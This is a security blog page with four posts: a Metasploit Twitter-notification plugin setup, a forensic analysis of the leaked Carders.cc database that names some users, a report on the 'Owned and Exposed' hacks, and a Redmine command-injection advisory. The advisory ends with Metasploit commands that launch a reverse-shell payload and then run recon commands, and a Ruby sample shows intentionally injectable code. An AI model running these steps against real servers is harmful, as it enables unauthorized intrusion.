All posts by wow

Twitt Metasploit Plugin on Ubuntu

The Twitt Metasploit plugin was written in Ruby by Carlos Perez, aka Dark Operator. It sends a Twitter direct message to a configured account whenever a Metasploit session is created or shut down; each message carries information about the session concerned.

Installation :

To install the Twitt Metasploit plugin on Ubuntu 10.04.1 LTS, you first need to update RubyGems with the following commands (thanks to Carlos for helping me update gem).

sudo gem install rubygems-update
cd /var/lib/gems/1.8/bin
sudo ./update_rubygems

Then install the Ruby gem the plugin depends on.

sudo gem install twitter

After this, download the twitt.rb script from GitHub and copy it into the Metasploit plugin directory, by default “/opt/metasploit3/msf3/plugins/”. Don’t forget to give the script the right user permissions, then launch Metasploit.

sudo msfconsole

Twitt plugin setup :

To set up the OAuth 1.0a plugin settings you first need a Twitter account, if you don’t already have one. You then need to register the Twitt application on the Twitter Developers site.

When you fill in the form, make sure the “Application Type” is “Client” and that the “Default Access Type” is “Read & Write”.

Twitter Developers Application Registration

Once the application is registered on Twitter, you will need the following configuration settings :

  • Consumer key, set with the “twitt_set_consumer_key” command.
  • Consumer secret, set with the “twitt_set_consumer_secret” command.
  • Access Token (oauth_token), set with the “twitt_set_oauth_token” command.
  • Access Token Secret (oauth_token_secret), set with the “twitt_set_oauth_token_secret” command.
  • Your Twitter username, set with the “twitt_set_user” command.

In Metasploit, load the plugin and configure it with the following commands :

Metasploit Twitt plugin loading
Metasploit Twitt plugin configuration

Replace the settings shown in the screenshots with your own 🙂

Then save the configuration with the “twitt_save” command :

Metasploit Twitt configuration saving

As you can see, all the configuration settings are saved into a “.yaml” file. Note that this file holds the OAuth consumer secret and access token secret in clear text, so keep it readable by your user only.

To display all the configuration settings stored in the “.yaml” file, type the “twitt_show_parms” command.

Metasploit Twitt plugin parameters

Then, to start the Twitt plugin, run the “twitt_start” command.

Metasploit Twitt plugin starting

From now on, each time a new Metasploit session is created, or a session is shut down, a direct message is sent to the configured Twitter account. Keep in mind that the session details therefore transit through Twitter. Below is a demonstration video.
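To make the procedure above concrete, here is an added example (not Carlos Perez’s twitt.rb, and not code from this post) of the three things such a plugin has to do: hold the twitt_set_* settings, persist them to a .yaml file the way twitt_save does, and turn a session open/close event into the text of a direct message. It is written so it runs without Metasploit: the setting names mirror the twitt_set_* commands listed above, the session object is assumed to expose sid, type, tunnel_peer and via_exploit as a Metasploit session does, the sender is injected so nothing here contacts Twitter, and the 140-character cut-off is assumed to be the direct-message limit of the time.

```ruby
require 'yaml'
require 'tmpdir'

# Added example, not Carlos Perez's twitt.rb. Assumptions: setting names mirror
# the twitt_set_* commands; SessionInfo carries the attributes a Metasploit
# session exposes; the sender is any callable so no Twitter client is needed;
# DM_LIMIT is the direct-message length limit assumed for the period.
SessionInfo = Struct.new(:sid, :type, :tunnel_peer, :via_exploit)

class TwittNotifier
  KEYS = %w[consumer_key consumer_secret oauth_token oauth_token_secret user].freeze
  DM_LIMIT = 140

  attr_reader :config

  # sender: anything responding to call(recipient, text), e.g. a thin wrapper
  # around the twitter gem's direct-message call
  def initialize(sender)
    @sender = sender
    @config = {}
  end

  # Counterpart of the twitt_set_<key> commands
  def set(key, value)
    key = key.to_s
    raise ArgumentError, "unknown parameter #{key}" unless KEYS.include?(key)
    @config[key] = value.to_s
    self
  end

  def complete?
    KEYS.all? { |k| !@config[k].to_s.empty? }
  end

  # Counterpart of twitt_save. The file holds the OAuth consumer secret and the
  # access token secret in clear text, so it is created owner-only (0600).
  def save(path)
    File.open(path, File::WRONLY | File::CREAT | File::TRUNC, 0o600) do |f|
      f.write(YAML.dump(@config))
    end
    File.chmod(0o600, path) # also tighten a file that already existed
    path
  end

  # Reads the .yaml back (the settings twitt_show_parms displays)
  def load(path)
    YAML.safe_load(File.read(path)).each { |k, v| set(k, v) }
    self
  end

  # Text of the direct message for one session event, cut to what fits in a DM
  def message(event, session, reason = '')
    parts = ["Session #{session.sid} (#{session.type}) #{event} #{session.tunnel_peer}"]
    parts << "via #{session.via_exploit}" if session.via_exploit
    parts << "reason: #{reason}" unless reason.to_s.empty?
    parts.join(' ')[0, DM_LIMIT]
  end

  # Named like the session-event callbacks a Metasploit plugin subscribes to
  def on_session_open(session)
    deliver(message('opened', session))
  end

  def on_session_close(session, reason = '')
    deliver(message('closed', session, reason))
  end

  private

  def deliver(text)
    raise 'plugin not configured, run the twitt_set_* commands first' unless complete?
    @sender.call(@config['user'], text)
  end
end

if __FILE__ == $PROGRAM_NAME
  notifier = TwittNotifier.new(->(user, text) { puts "DM to #{user}: #{text}" })
  TwittNotifier::KEYS.each { |k| notifier.set(k, "example-#{k}") } # placeholder values
  path = notifier.save(File.join(Dir.tmpdir, 'twitt_example.yaml'))
  puts "saved #{path} (mode #{File.stat(path).mode.to_s(8)[-3..]})"
  session = SessionInfo.new(1, 'shell', '192.168.178.21:4444', 'exploit/unix/webapp/redmine_scm_exec')
  notifier.on_session_open(session)
  notifier.on_session_close(session, 'Died')
  File.delete(path)
end
```

The injected sender is what keeps the secrets and the target details out of any test run; in the real plugin that slot is the Twitter client built from the four OAuth values.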

Owned and Exposed Episode 2 – Carders.cc database forensic

As written in my previous blog post, the Carders.cc database is in the wild, and its content gives some interesting information.

First we take a look at the “user” table. It contains 8 425 entries, with a first registration date of “Sep-17-2008 16:09” and a last registration date of “Dec-06-2010 00:12”. We can therefore suppose that the dump was made on 6 December, and that the server was owned by that date at the latest.

With a simple SQL query we export a CSV file in order to build a Google visualization gadget showing the number of registrations (joindate table field) per day.

SELECT date(from_unixtime(joindate)) as bydate, count(*) as byday
FROM user
group by bydate order by bydate asc

The Google visualization result is in the “UsersRegistrations1” tab.

As you may remember, Carders.cc was targeted by the “Owned and Exposed” team at the beginning of May 2010, and the whole site was “rm’ed”. But as you can see, by 22 May the website was back online and registrations had resumed. You can also see a second registration peak beginning on 23 October.

Now we check the lastvisit table field, which holds the timestamp of each user’s last visit. The first lastvisit date is “May-25-2010 00:05” and the last one “Dec-06-2010 00:12”. This shows that Carders.cc had a backup of the forum database from before the server was “rm’ed” by the “Owned and Exposed” team: some users who had registered before May 2010 kept using the same account after the forum was restored, for example KRON0S and Vitali.

With another SQL query we export all the lastvisit timestamps to get an overview of last visits per day.

SELECT date(from_unixtime(lastvisit)) as bydate, count(*) as byday
FROM user
group by bydate order by bydate asc

The Google visualization result is in the “UsersLastVisits1” tab.

You can see a peak of visits from 2 to 5 December, an abnormal activity that should be investigated in another post. The peak of new registrations between 23 October and 14 November is surely related.

To see the real number of users who joined the Carders.cc forum since the May restoration, we run this query.

SELECT count(*) FROM `user` WHERE `joindate` > '1274738400'

The result is 6 700 new users, so before the May “rm’ed” there were only 1 725 registered users. Is the buzz around the first “Owned and Exposed” hack the reason for this crazy increase? It looks like the buzz worked: a lot of people who did not know Carders.cc before the May hack discovered and joined the community after the “Owned and Exposed” hack.

To get a clear view of the number of new registrations per day after the May 2010 hack, we run a new query and build another Google visualization in the “UsersRegistrations2” tab.

SELECT date(from_unixtime(joindate)) as bydate, count(*) as byday
FROM user
WHERE joindate > '1274738400'
group by bydate order by bydate asc

Clearly, right after the forum restoration the number of new registrations per day increased compared with the period before the May 2010 hack. Before May 2010, 1 725 users in 591 days, an average of 2.9 new users per day. After the restoration, 6 700 users in 195 days (25 May to 6 December), an average of about 34 new users per day.

To be fair, we do the same calculation from 25 May to 23 October, just before the registration peak.

SELECT count(*) FROM user WHERE joindate between '1274738400' and '1287784800'

We get 4 068 users in 152 days, an average of 26.8 new users per day. What is interesting is that after the 23 October registration peak we have 2 632 new users in 42 days, an average of 62.7 new users per day! The 23 October registration peak is thus confirmed as an abnormal point in the forum’s lifecycle.

Carders.cc could say thank you to the “Owned and Exposed” team for the buzz created by the hack: before the May 2010 hack an average of 2.9 new users per day, and after the hack an average of 26.8 new users per day.
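The queries above (registrations and last visits bucketed per day, counts between two timestamps, daily averages) are what the whole analysis rests on, so here they are redone in plain Ruby over a constructed user table, as an added example that is not part of the original post. It goes one step beyond the post by flagging the abnormal days automatically instead of reading them off a chart. The rows are made up; timestamps are treated as UTC, whereas the post’s MySQL from_unixtime() used the server’s time zone, so day boundaries may differ from the post’s by a few hours.

```ruby
require 'time'

# Added example, not from the original post. Rows below are constructed;
# dates are UTC (the post's from_unixtime() used the MySQL server zone).
User = Struct.new(:username, :joindate, :lastvisit)

def epoch(y, m, d)
  Time.utc(y, m, d).to_i
end

# SELECT date(from_unixtime(col)) AS bydate, count(*) AS byday
# FROM user GROUP BY bydate ORDER BY bydate ASC
def per_day(users, column)
  raise ArgumentError, "unknown column #{column}" unless %i[joindate lastvisit].include?(column)
  users.group_by { |u| Time.at(u[column]).utc.strftime('%Y-%m-%d') }
       .map { |day, rows| [day, rows.size] }
       .sort_by(&:first)
end

# SELECT count(*) FROM user WHERE joindate >= start AND joindate < stop
def count_between(users, start, stop = Float::INFINITY)
  users.count { |u| u.joindate >= start && u.joindate < stop }
end

# The "new users per day" figure for one period
def daily_average(users, start, stop)
  count_between(users, start, stop).to_f / ((stop - start) / 86_400.0)
end

# Days whose count is at least `factor` times the median day: the kind of
# peak the post points at on 23 October and 2-5 December.
def spike_days(series, factor = 3)
  counts = series.map(&:last).sort
  median = counts[counts.size / 2]
  series.select { |_, c| c >= factor * median }.map(&:first)
end

# Constructed table: one registration a day for ten quiet days after the
# restoration, then a burst of eight accounts on 23 October that all
# last visited on 5 December.
def sample_users
  quiet = (0...10).map do |i|
    day = epoch(2010, 5, 25) + i * 86_400
    User.new("user#{i}", day + 3600, day + 7200)
  end
  burst = (0...8).map do |i|
    User.new("burst#{i}", epoch(2010, 10, 23) + 60 * i, epoch(2010, 12, 5) + 600)
  end
  quiet + burst
end

if __FILE__ == $PROGRAM_NAME
  users = sample_users
  puts 'registrations per day:'
  per_day(users, :joindate).each { |day, n| puts "  #{day}  #{n}" }
  restore = epoch(2010, 5, 25)
  peak = epoch(2010, 10, 23)
  puts "since restoration: #{count_between(users, restore)} users"
  puts "quiet period average: #{daily_average(users, restore, peak).round(2)} users/day"
  puts "abnormal days: #{spike_days(per_day(users, :joindate)).join(', ')}"
end
```

The boundaries passed to count_between are the same kind of Unix timestamps the post uses (1274738400 and 1287784800), so the functions can be pointed at a real export without changes.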

Owned and Exposed Episode 2, Exploit-DB.com, BackTrack-Linux.org, Carders.cc, Ettercap and Inj3ct0r.

What an unexpected Christmas present, provided by the self-styled “Security Watchmen”, to Carders.cc, a criminal forum specialized in trading stolen credit cards, but also to some well-known security scene actors such as Exploit-DB.com, BackTrack-Linux.org, Ettercap, Inj3ct0r.com and Free-Hack.com.

The ezine “Owned and Exposed”, which security experts are starting to fear, has released its second edition. The previous edition of this online magazine, dating from May 2010, had already targeted Carders.cc and revealed technical and organizational details of this group of criminals.

Contents of this second edition :
  • Carders.cc “Owned and Exposed”
When editing the first edition of their magazine, the authors wanted to deal a fatal blow to Carders.cc in order to stop its criminal activities. Unfortunately the attack of May 2010 was not enough to stop the forum, which came back online shortly after being “rm’ed”. Seven months later, Carders.cc is again a prime target.

All the depths of the server hosting the Carders.cc forum are exposed in the magazine, and all administrative accounts are revealed. A copy of the forum database is currently available on the Internet. The “Security Watchmen” hope that this time the message has got through and that we will see the definitive end of the criminal forum Carders.cc. Otherwise, it is clear that the forum will again be a target in the third edition of the “Owned and Exposed” magazine.
  • Inj3ct0r “Owned and Exposed”
Inj3ct0r, for those who do not know the site, is a copy of Milw0rm offering a database of 0days and exploits. According to the magazine, the “Security Watchmen” motivation for attacking Inj3ct0r is based primarily on the fact that Inj3ct0r is considered a “lameass wannabe milw0rm kid” that publishes only XSS attacks (regarded as low-level attacks by the “Security Watchmen”), but also on the claim that, behind this facade of an exploit database, the Inj3ct0r team actually runs a business based on stolen credit cards.

Again all the depths of the server hosting Inj3ct0r are exposed in the magazine, and all administrative accounts are revealed. A copy of the website database is currently available on the Internet.
  • Ettercap “Owned and Exposed”
Ettercap is a tool for performing MITM (Man in the Middle) attacks. It has existed since 2001 and is used by computer security experts. The “Security Watchmen” motivation for attacking Ettercap is based primarily on their view that the Ettercap software suite is detrimental to the security community and that the team maintaining it considers themselves security experts.

What is disturbing about this hack is, first, that according to the “Security Watchmen” the Ettercap source code has been compromised for about five years, and second, that the Ettercap website is hosted at SourceForge, which raises the question of whether other projects hosted at SourceForge could be affected as well.

Again the depths of the server hosting the Ettercap project are outlined in the magazine, and all administrative accounts are revealed. The list of processes running on the SourceForge server hosting the Ettercap project shows that bots have the upper hand on it.
  • Exploit-DB and BackTrack Linux “Owned and Exposed”
Exploit-DB is a 0day and exploit database; BackTrack Linux is an operating system bundling security software widely used by security experts. The “Security Watchmen” motivation for attacking Exploit-DB and BackTrack Linux is based primarily on their belief that such projects give computer criminals new ways to commit crimes.

Again the depths of the servers hosting Exploit-DB and BackTrack Linux are exposed in the magazine, and all administrative accounts are revealed. We should get some clarification from the BackTrack Linux team on whether the distribution itself was compromised or not.

These attacks on sites well known to the computer security community will surely create a sense of paranoia until the third edition of the electronic magazine “Owned and Exposed”.

OSVDB-70090 : Remote Code Execution for Redmine

Timeline :

Vulnerability submitted by joernchen to Redmine on 2010-12-18
Vulnerability advisory and new package provided by Redmine on 2010-12-23
Metasploit exploit released on 2010-12-24

PoC provided by :

joernchen

Reference(s) :

OSVDB-70090

Affected version(s) :

All Redmine versions before 1.0.5, the 0.9.x branch included
redmine_1.0.4-1_all.deb on Debian Squeeze / Sid
redmine_1.0.4-1_all.deb on Ubuntu Lucid

Tested on Ubuntu Lucid 10.04.1 LTS with :

CVS as SCM

Description :

joernchen has reported a vulnerability, which can be classified as highly critical, in the Redmine project management web application; it allows an attacker to compromise a vulnerable system.

The value submitted in the “rev” parameter of the “repository/annotate” script of a Redmine project is not sanitized before being used. This can be exploited to execute arbitrary code remotely on the vulnerable server.

The vulnerability mainly affects the bazaar, cvs, darcs and mercurial SCM adapters. The code is executed with the privileges of the user running the Redmine web application (for example www-data).

The vulnerability has been confirmed for all versions before 1.0.5. The vendor has released an update correcting it.
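To show the bug class behind an unsanitized “rev” parameter reaching an SCM command, here is an added example that is not Redmine’s code and not part of this advisory: a constructed adapter method that interpolates the revision into a shell command string, next to a hardened version that validates the revision and execs the SCM binary without a shell. The shell tool printf stands in for cvs/hg/bzr/darcs so the block runs anywhere, and the revision grammar REV_RE is an assumption that should be tightened to the real SCM’s revision syntax.

```ruby
require 'open3'

# Added example, not Redmine's code. printf stands in for the SCM binary;
# REV_RE is an assumed revision grammar, not one taken from any SCM.
class VulnerableAdapter
  # One command string handed to /bin/sh: every shell metacharacter in rev
  # (; | & $( ) backtick) is interpreted, so "1.1; id" runs id as the
  # user serving the application.
  def annotate(path, rev)
    `printf '%s@%s' #{path} #{rev}` # think: "cvs annotate -r #{rev} #{path}"
  end
end

class HardenedAdapter
  # Alphanumerics, dot, underscore, colon, dash; no leading dash so the value
  # can never be parsed as an option by the SCM binary either.
  REV_RE = /\A[A-Za-z0-9._:][A-Za-z0-9._:-]{0,63}\z/

  def annotate(path, rev)
    unless rev.is_a?(String) && rev.match?(REV_RE)
      raise ArgumentError, "invalid revision #{rev.inspect}"
    end
    if path.include?("\0") || path.start_with?('-')
      raise ArgumentError, "invalid path #{path.inspect}"
    end
    # argv form: Ruby execs the binary directly, no shell, one argument per
    # element, so metacharacters in rev or path are passed through literally.
    out, status = Open3.capture2('printf', '%s@%s', path, rev)
    raise "scm command failed: #{status}" unless status.success?
    out
  end
end

if __FILE__ == $PROGRAM_NAME
  tainted = '1.1; echo INJECTED'
  puts "vulnerable: #{VulnerableAdapter.new.annotate('trunk/README', tainted).inspect}"
  begin
    HardenedAdapter.new.annotate('trunk/README', tainted)
  rescue ArgumentError => e
    puts "hardened:   #{e.message}"
  end
  puts "hardened:   #{HardenedAdapter.new.annotate('trunk/README', '1.1').inspect}"
end
```

The allow-list is the part that matters: quoting the value for the shell would stop the `;` case but not an option injection such as a revision starting with `--`, which the argv form alone does not prevent either.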

Commands :

use exploit/unix/webapp/redmine_scm_exec
set RHOST 192.168.178.21
set URI /redmine/projects/project2/
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.178.21
exploit

id
uname -a
/sbin/ifconfig